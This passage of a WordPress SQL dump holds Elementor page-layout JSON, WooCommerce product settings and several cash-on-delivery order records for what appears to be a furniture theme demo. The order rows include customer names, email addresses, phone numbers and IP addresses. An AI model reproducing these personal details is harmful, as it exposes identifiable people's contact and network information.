fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1384,2469,'_elementor_page_assets','a:0:{}'),(1386,3477,'_order_key','wc_order_A33xobqTOxMZi'),(1387,3477,'_customer_user','4'),(1388,3477,'_payment_method','cod'),(1389,3477,'_payment_method_title','Cash on delivery'),(1390,3477,'_customer_ip_address','123.25.25.16'),(1391,3477,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'),(1392,3477,'_created_via','checkout'),(1393,3477,'_cart_hash','fc66eb84f5dc7403a2009b79cf14d5f7'),(1394,3477,'_billing_first_name','Duong'),(1395,3477,'_billing_last_name','Mr'),(1396,3477,'_billing_address_1','New York'),(1397,3477,'_billing_city','New York'),(1398,3477,'_billing_state','CA'),(1399,3477,'_billing_postcode','90001'),(1400,3477,'_billing_country','US'),(1401,3477,'_billing_email','yourtime2106@gmail.com'),(1402,3477,'_billing_phone','68686868686'),(1403,3477,'_order_currency','USD'),(1404,3477,'_cart_discount','0'),(1405,3477,'_cart_discount_tax','0'),(1406,3477,'_order_shipping','0'),(1407,3477,'_order_shipping_tax','0'),(1408,3477,'_order_tax','0'),(1409,3477,'_order_total','33.00'),(1410,3477,'_order_version','6.6.1'),(1411,3477,'_prices_include_tax','no'),(1412,3477,'_billing_address_index','Duong Mr  New York  New York CA 90001 US yourtime2106@gmail.com 68686868686'),(1413,3477,'_shipping_address_index','         '),(1414,3477,'is_vat_exempt','no'),(1415,3477,'_download_permissions_granted','yes'),(1416,3477,'_recorded_sales','yes'),(1417,3477,'_recorded_coupon_usage_counts','yes'),(1418,3477,'_order_stock_reduced','yes'),(1419,3477,'_new_order_email_sent','true'),(1420,3727,'_order_key','wc_order_PULHZTn1JkAni'),(1421,3727,'_customer_user','1'),(1422,3727,'_payment_method','cod'),(1423,3727,'_payment_method_title','Cash on delivery'),(1424,3727,'_customer_ip_address','101.99.15.148'),(1425,3727,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'),(1426,3727,'_created_via','checkout'),(1427,3727,'_cart_hash','fc66eb84f5dc7403a2009b79cf14d5f7'),(1428,3727,'_billing_first_name','Phuc'),(1429,3727,'_billing_last_name','Van'),(1430,3727,'_billing_address_1','fsfs f'),(1431,3727,'_billing_city','Ha Noi'),(1432,3727,'_billing_postcode','100000'),(1433,3727,'_billing_country','VN'),(1434,3727,'_billing_email','phucnvv@gmail.com'),(1435,3727,'_billing_phone','0912495488'),(1436,3727,'_order_currency','USD'),(1437,3727,'_cart_discount','0'),(1438,3727,'_cart_discount_tax','0'),(1439,3727,'_order_shipping','0'),(1440,3727,'_order_shipping_tax','0'),(1441,3727,'_order_tax','0'),(1442,3727,'_order_total','33.00'),(1443,3727,'_order_version','6.6.1'),(1444,3727,'_prices_include_tax','no'),(1445,3727,'_billing_address_index','Phuc Van  fsfs f  Ha Noi  100000 VN phucnvv@gmail.com 0912495488'),(1446,3727,'_shipping_address_index','         '),(1447,3727,'is_vat_exempt','no'),(1448,3727,'_download_permissions_granted','yes'),(1449,3727,'_recorded_sales','yes'),(1450,3727,'_recorded_coupon_usage_counts','yes'),(1451,3727,'_order_stock_reduced','yes'),(1452,3727,'_new_order_email_sent','true'),(1453,3730,'_regular_price','30'),(1454,3730,'total_sales','0'),(1455,3730,'_tax_status','taxable'),(1456,3730,'_tax_class',''),(1457,3730,'_manage_stock','no'),(1458,3730,'_backorders','no'),(1459,3730,'_sold_individually','no'),(1460,3730,'_virtual','no'),(1461,3730,'_downloadable','no'),(1462,3730,'_download_limit','-1'),(1463,3730,'_download_expiry','-1'),(1464,3730,'_stock',''),(1465,3730,'_stock_status','instock'),(1466,3730,'_wc_average_rating','0'),(1467,3730,'_wc_review_count','0'),(1468,3730,'_product_version','6.6.1'),(1469,3730,'_price','30'),(1470,3730,'_thumbnail_id','4067'),(1471,3782,'_regular_price','55'),(1472,3782,'total_sales','0'),(1473,3782,'_tax_status','taxable'),(1474,3782,'_tax_class',''),(1475,3782,'_manage_stock','no'),(1476,3782,'_backorders','no'),(1477,3782,'_sold_individually','no'),(1478,3782,'_virtual','no'),(1479,3782,'_downloadable','no'),(1480,3782,'_download_limit','-1'),(1481,3782,'_download_expiry','-1'),(1482,3782,'_stock',''),(1483,3782,'_stock_status','instock'),(1484,3782,'_wc_average_rating','0'),(1485,3782,'_wc_review_count','0'),(1486,3782,'_product_version','6.6.1'),(1487,3782,'_price','55'),(1488,3782,'_thumbnail_id','4068'),(1489,3782,'_wp_old_slug','big-sofa'),(1490,3783,'_regular_price','33'),(1491,3783,'total_sales','0'),(1492,3783,'_tax_status','taxable'),(1493,3783,'_tax_class',''),(1494,3783,'_manage_stock','no'),(1495,3783,'_backorders','no'),(1496,3783,'_sold_individually','no'),(1497,3783,'_virtual','no'),(1498,3783,'_downloadable','no'),(1499,3783,'_download_limit','-1'),(1500,3783,'_download_expiry','-1'),(1501,3783,'_stock',''),(1502,3783,'_stock_status','instock'),(1503,3783,'_wc_average_rating','0'),(1504,3783,'_wc_review_count','0'),(1505,3783,'_product_version','6.6.1'),(1506,3783,'_price','33'),(1507,3783,'_thumbnail_id','4070'),(1508,3784,'_regular_price','40'),(1509,3784,'total_sales','0'),(1510,3784,'_tax_status','taxable'),(1511,3784,'_tax_class',''),(1512,3784,'_manage_stock','no'),(1513,3784,'_backorders','no'),(1514,3784,'_sold_individually','no'),(1515,3784,'_virtual','no'),(1516,3784,'_downloadable','no'),(1517,3784,'_download_limit','-1'),(1518,3784,'_download_expiry','-1'),(1519,3784,'_stock',''),(1520,3784,'_stock_status','instock'),(1521,3784,'_wc_average_rating','5.00'),(1522,3784,'_wc_review_count','1'),(1523,3784,'_product_version','7.1.0'),(1524,3784,'_price','40'),(1525,3784,'_thumbnail_id','4069'),(1526,3784,'_wc_rating_count','a:1:{i:5;i:1;}'),(1527,3788,'_regular_price','23'),(1528,3788,'total_sales','1'),(1529,3788,'_tax_status','taxable'),(1530,3788,'_tax_class',''),(1531,3788,'_manage_stock','no'),(1532,3788,'_backorders','no'),(1533,3788,'_sold_individually','no'),(1534,3788,'_virtual','no'),(1535,3788,'_downloadable','no'),(1536,3788,'_download_limit','-1'),(1537,3788,'_download_expiry','-1'),(1538,3788,'_stock',''),(1539,3788,'_stock_status','instock'),(1540,3788,'_wc_average_rating','5.00'),(1541,3788,'_wc_review_count','1'),(1542,3788,'_product_version','7.1.0'),(1543,3788,'_price','20'),(1544,3788,'_sale_price','20'),(1545,3788,'_thumbnail_id','4065'),(1546,3788,'_wp_old_slug','classic-chair-2'),(1547,3788,'_wp_old_slug','classic-lamp'),(1548,3788,'_wc_rating_count','a:1:{i:5;i:1;}'),(1549,4075,'_order_key','wc_order_gTwKys1qXuYrd'),(1550,4075,'_customer_user','4'),(1551,4075,'_payment_method','cod'),(1552,4075,'_payment_method_title','Cash on delivery'),(1553,4075,'_customer_ip_address','101.99.15.148'),(1554,4075,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'),(1555,4075,'_created_via','checkout'),(1556,4075,'_cart_hash','92e5cadd4085e6dfe9eaccf002ba6609'),(1557,4075,'_billing_first_name','Duong'),(1558,4075,'_billing_last_name','Mr'),(1559,4075,'_billing_address_1','New York'),(1560,4075,'_billing_city','New York'),(1561,4075,'_billing_state','CA'),(1562,4075,'_billing_postcode','90001'),(1563,4075,'_billing_country','US'),(1564,4075,'_billing_email','yourtime2106@gmail.com'),(1565,4075,'_billing_phone','68686868686'),(1566,4075,'_order_currency','USD'),(1567,4075,'_cart_discount','0'),(1568,4075,'_cart_discount_tax','0'),(1569,4075,'_order_shipping','0'),(1570,4075,'_order_shipping_tax','0'),(1571,4075,'_order_tax','0'),(1572,4075,'_order_total','20.00'),(1573,4075,'_order_version','6.6.1'),(1574,4075,'_prices_include_tax','no'),(1575,4075,'_billing_address_index','Duong Mr  New York  New York CA 90001 US yourtime2106@gmail.com 68686868686'),(1576,4075,'_shipping_address_index','         '),(1577,4075,'is_vat_exempt','no'),(1578,4075,'_download_permissions_granted','yes'),(1579,4075,'_recorded_sales','yes'),(1580,4075,'_recorded_coupon_usage_counts','yes'),(1581,4075,'_order_stock_reduced','yes'),(1582,4075,'_new_order_email_sent','true'),(1583,4615,'_wp_page_template','default'),(1584,4615,'_elementor_edit_mode','builder'),(1585,4615,'_elementor_template_type','wp-post'),(1586,4615,'_elementor_version','3.6.6'),(1587,4615,'_elementor_data','[{\"id\":\"dc1de50\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"15\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"0183fbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"452409e\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"bc4c9cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"406f25a\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f7278e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"5a9b913\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"b8901ed\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1588,4615,'_elementor_page_assets','a:0:{}'),(1589,4616,'_wp_page_template','default'),(1590,4616,'_elementor_edit_mode','builder'),(1591,4616,'_elementor_template_type','wp-post'),(1592,4616,'_elementor_version','3.6.6'),(1593,4616,'_elementor_data','[{\"id\":\"7a4dbe5\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"40\",\"bottom\":\"4\",\"left\":\"40\",\"isLinked\":false},\"hide_mobile\":\"hidden-mobile\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"c7453ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-start\"},\"elements\":[{\"id\":\"f6049c6\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"c62eee8\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\",\"icons_display\":\"flex\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"19f1469\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\"},\"elements\":[{\"id\":\"741870a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"text\",\"email_label\":\"needhel@company.com\",\"email_address\":\"needhel@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"},\"text\":\"Mon - Sat: 8.00 am - 7.00 pm\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"ac74640\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9050f\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"70\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"background_background\":\"classic\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"d0c5e47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"3d4c05c\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"6eaf1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"4c538c3\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f4f1d3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"e0ad28b\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"0b0c6e3\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1594,4616,'_elementor_page_assets','a:0:{}'),(1595,4617,'_wp_page_template','default'),(1596,4617,'_elementor_edit_mode','builder'),(1597,4617,'_elementor_template_type','wp-post'),(1598,4617,'_elementor_version','3.6.6'),(1599,4617,'_elementor_data','[{\"id\":\"0c5f0dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"8\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"f93bc8a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"763f753\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Call anytime\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"bf1b6c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"f00805a\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"beab91f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"b558664\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Send email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 